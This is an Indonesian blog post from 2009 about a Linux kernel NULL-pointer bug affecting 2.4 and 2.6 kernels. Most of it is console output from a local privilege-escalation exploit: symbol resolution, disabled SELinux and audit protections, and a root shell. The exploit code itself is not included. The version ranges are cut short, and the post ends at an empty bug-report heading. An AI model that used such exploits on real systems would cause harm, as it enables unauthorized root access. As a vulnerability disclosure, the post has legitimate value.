Showing posts from August, 2009

Bug kernel linux (2009)

Ditemukan bug di kernel linux yang cukup serius, penyebabnya NULL pointer. Kalau di-exploit bisa sampai dapet root... osram........ The system would do anything for you..

Hampir semua kernel dari versi 2.4 sampai 2.6 terkena bug ini:
- Linux 2.4, from 2.4.4 up to and including
- Linux 2.6, from 2.6.0 up to and including

exploit testing:

$ ./script
[+] Resolved selinux_enforcing to 0xffffffff80bb4348
[+] Resolved selinux_enabled to 0xffffffff80bb4344
[+] Resolved security_ops to 0xffffffff80bb2ae0
[+] Resolved default_security_ops to 0xffffffff808e55a0
[+] Resolved sel_read_enforce to 0xffffffff803e16e0
[+] Resolved audit_enabled to 0xffffffff80ae2ec4
[+] Resolved commit_creds to 0xffffffff8026d3f0
[+] Resolved prepare_kernel_cred to 0xffffffff8026d040
[+] got ring0!
[+] detected 2.6 style 4k stacks
sh: mplayer: not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
# id
uid=0(root) gid=0(root)

Original bug report: